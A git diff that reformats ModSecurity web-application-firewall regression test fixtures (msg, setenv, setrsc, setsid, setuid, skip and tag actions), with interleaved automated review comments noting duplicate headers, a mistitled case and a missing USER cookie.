\"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setvar:tx.ua_hash=%{matched_var},nolog,pass\"", "SecRule &TX:REAL_IP \"@eq 0\" \"id:'900021',phase:1,t:none,initcol:global=global,initcol:ip=%{remote_addr}_%{tx.ua_hash},setvar:tx.real_ip=%{remote_addr},nolog,pass\"", diff --git a/test/test-cases/regression/action-msg.json b/test/test-cases/regression/action-msg.json index 6933be8aa5..34e9fe5fed 100644 --- a/test/test-cases/regression/action-msg.json +++ b/test/test-cases/regression/action-msg.json 
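Review bot: The reformatted `request.headers` object still has two `"User-Agent"` members (`"curl/7.38.0"` and `"My sweet little browser"`), and which one survives parsing of a duplicated JSON key is implementation-dependent. Rule 900018 hashes `REQUEST_HEADERS:User-Agent` into `tx.ua_hash`, which rule 900021 uses in the `initcol:ip` key, so the collection key under test depends on that parser behaviour. Keeping only the intended header, e.g. `"User-Agent": "My sweet little browser",`, makes the fixture deterministic. The same duplicate is carried through the action-setenv, action-setrsc, action-setsid, action-setuid and action-skip hunks.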
@@ -1,115 +1,119 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: msg (this test is not really testing it)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: msg (this test is not really testing it)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + 
"Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving msg: This is a test, text\/html,application", - "error_log":"" + "expected": { + "debug_log": "Saving msg: This is a test, text/html,application", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, - { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: msg - variable expansion", - "client":{ - "ip":"200.249.12.31", - "port":2313 + { + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: msg - variable expansion", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": 
"en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving msg: This is a test: PHPSESSID ops", - "error_log":"" + "expected": { + "debug_log": "Saving msg: This is a test: PHPSESSID ops", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@rx PHPSESSID\" \"id:1,capture,t:lowercase,t:none,msg:'This is a test: %{TX.0}% ops'\"", "SecRule TX \"@rx to_test\" \"id:2,t:lowercase,capture,t:none\"" diff --git a/test/test-cases/regression/action-setenv.json b/test/test-cases/regression/action-setenv.json index 2bbe967a4d..e884f00247 100644 --- a/test/test-cases/regression/action-setenv.json +++ b/test/test-cases/regression/action-setenv.json 
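Review bot: Both cases replace the placeholder `"Content-Length":"length\n\r"` with `"Content-Length": "384"`, but the neighbouring `"Content-Type": "text/xml; charset=utf-8\n\r"` keeps its embedded line-terminator bytes, so the response headers are only half normalised. A header value ending in `\n\r` is not what a server would deliver to the engine, and nothing visible in the rules depends on it; `"Content-Type": "text/xml; charset=utf-8",` would match the cleaned-up length header. The body lines also end in `\n\r` rather than `\r\n`, so it is worth confirming that 384 was computed over exactly these bytes. The same header value appears in the action-tag.json hunk that follows.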
@@ -1,93 +1,132 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing setsid action (1/3)", - "expected":{ - "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "enabled": 1, + "version_min": 300000, + "title": "Testing setsid action (1/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"^(.*)$\" \"id:'900018',phase:2,setenv:'variable=%{matched_var}',pass\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing setenv action (2/3)", - "expected":{ - "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "enabled": 1, + "version_min": 300000, + "title": "Testing setenv action (2/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + 
"Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"^(.*)$\" \"id:'900018',phase:2,setenv:variable=%{matched_var},pass\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing setenv action (3/3)", - "expected":{ - "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120==test=test" + "enabled": 1, + "version_min": 300000, + "title": "Testing setenv action (3/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + 
"body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Setting environment variable: variable to PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120==test=test", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"^(.*)$\" \"id:'900018',phase:2,setenv:variable=%{matched_var}==test=test,pass\"" ] diff --git a/test/test-cases/regression/action-setrsc.json b/test/test-cases/regression/action-setrsc.json index ffc4e0f226..7be0c0d317 100644 --- a/test/test-cases/regression/action-setrsc.json +++ b/test/test-cases/regression/action-setrsc.json 
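Review bot: The first case in this file is still titled `"Testing setsid action (1/3)"` although its rule uses `setenv:'variable=%{matched_var}'` and its siblings are titled "setenv action (2/3)" and "(3/3)". Since the line is being rewritten anyway, `"title": "Testing setenv action (1/3)",` would keep failure reports attributable to the right action. Because the loader in this commit builds map keys from file name plus title, the title is also what identifies the case in the results.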
@@ -1,31 +1,44 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing setrsc action", - "expected":{ - "debug_log": "Saving variable: RESOURCE:score with value: " + "enabled": 1, + "version_min": 300000, + "title": "Testing setrsc action", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Saving variable: RESOURCE:score with value: ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setrsc:'test',nolog,pass\"", "SecRule REQUEST_HEADERS \".*\" \"id:'900021',phase:1,setvar:RESOURCE.score=+10\"", diff --git a/test/test-cases/regression/action-setsid.json b/test/test-cases/regression/action-setsid.json index 2d4e2cddfd..84bdc90db8 100644 --- a/test/test-cases/regression/action-setsid.json +++ b/test/test-cases/regression/action-setsid.json 
@@ -1,31 +1,44 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing setsid action", - "expected":{ - "debug_log": "Saving variable: SESSION:score with value: " + "enabled": 1, + "version_min": 300000, + "title": "Testing setsid action", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Saving variable: SESSION:score with value: ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setsid:%{REQUEST_COOKIES:PHPSESSID}%,nolog,pass\"", "SecRule REQUEST_HEADERS \".*\" \"id:'900021',phase:1,setvar:SESSION.score=+10\"", diff --git a/test/test-cases/regression/action-setuid.json b/test/test-cases/regression/action-setuid.json index 726efd1e64..f9300f5104 100644 --- a/test/test-cases/regression/action-setuid.json +++ b/test/test-cases/regression/action-setuid.json 
@@ -1,31 +1,44 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing setuid action", - "expected":{ - "debug_log": "Saving variable: USER:score with value: " + "enabled": 1, + "version_min": 300000, + "title": "Testing setuid action", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Saving variable: USER:score with value: ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'900018',phase:1,t:none,t:sha1,t:hexEncode,setuid:%{REQUEST_COOKIES:USER}%,nolog,pass\"", "SecRule REQUEST_HEADERS \".*\" \"id:'900021',phase:1,setvar:USER.score=+10\"", diff --git a/test/test-cases/regression/action-skip.json b/test/test-cases/regression/action-skip.json index cb7ba14918..132a9c4215 100644 --- a/test/test-cases/regression/action-skip.json +++ b/test/test-cases/regression/action-skip.json 
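Review bot: Rule 900018 sets the user id with `setuid:%{REQUEST_COOKIES:USER}%`, but the request's `Cookie` header only carries `PHPSESSID=...`, so the macro presumably expands to an empty string and the USER collection is keyed on nothing. The expectation `Saving variable: USER:score with value: ` would then pass without showing that a real identifier was bound. Either add a `USER=<constructed value>` pair to the `Cookie` header or point the rule at `REQUEST_COOKIES:PHPSESSID`, as the setsid fixture does. The rules array continues past the end of this hunk, so later rules may affect this.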
@@ -1,31 +1,44 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing skip action 1/3", - "expected":{ - "debug_log": "\\[9\\] Skipped rule id \\'2\\' due to a \\`skip\\' action." + "enabled": 1, + "version_min": 300000, + "title": "Testing skip action 1/3", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "\\[9\\] Skipped rule id \\'2\\' due to a \\`skip\\' action.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'1',phase:1,skip:1\"", "SecRule REQUEST_HEADERS \"should be skipped\" \"id:'2',phase:1,setvar:SESSION.score=+10\"", 
@@ -34,32 +47,45 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing skip action 2/3", - "expected":{ - "parser_error": "Rules error. File: action-skip.json. Line: 2. Column: 71. Expecting an action, got: skip:abc" + "enabled": 1, + "version_min": 300000, + "title": "Testing skip action 2/3", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "http_code": 200, + "parser_error": "Rules error. File: action-skip.json. Line: 2. Column: 71. Expecting an action, got: skip:abc" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'1',phase:1,skip:abc\"", "SecRule REQUEST_HEADERS \"should be skipped\" \"id:'2',phase:1,setvar:SESSION.score=+10\"", 
@@ -68,32 +94,45 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing skip action 3/3", - "expected":{ - "debug_log": "\\[9\\] Skipped rule id \\'3\\' due to a \\`skip\\' action." + "enabled": 1, + "version_min": 300000, + "title": "Testing skip action 3/3", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "User-Agent": "My sweet little browser", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Content-Length": "0" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "User-Agent":"My sweet little browser", - "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120" + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "\\[9\\] Skipped rule id \\'3\\' due to a \\`skip\\' action.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:User-Agent \"^(.*)$\" \"id:'1',phase:1,skip:2\"", "SecRule REQUEST_HEADERS \"should be skipped\" \"id:'2',phase:1,setvar:SESSION.score=+10\"", diff --git a/test/test-cases/regression/action-tag.json b/test/test-cases/regression/action-tag.json index 870297b462..b678f5609b 100644 --- a/test/test-cases/regression/action-tag.json +++ b/test/test-cases/regression/action-tag.json 
@@ -1,115 +1,119 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: tag 1", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: tag 1", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " 
\n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Rule tag: teste", - "error_log":"" + "expected": { + "debug_log": "Rule tag: teste", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,tag:'teste',t:lowercase,t:none\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: tag 2", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: tag 2", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", 
+ "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Rule tag: teste no-cache", - "error_log":"" + "expected": { + "debug_log": "Rule tag: teste no-cache", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,tag:'teste %{REQUEST_HEADERS:Pragma}%',t:lowercase,t:none\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" diff --git a/test/test-cases/regression/action-tnf-base64.json b/test/test-cases/regression/action-tnf-base64.json index 7cb047ce2f..5378e54f87 100644 --- a/test/test-cases/regression/action-tnf-base64.json +++ b/test/test-cases/regression/action-tnf-base64.json 
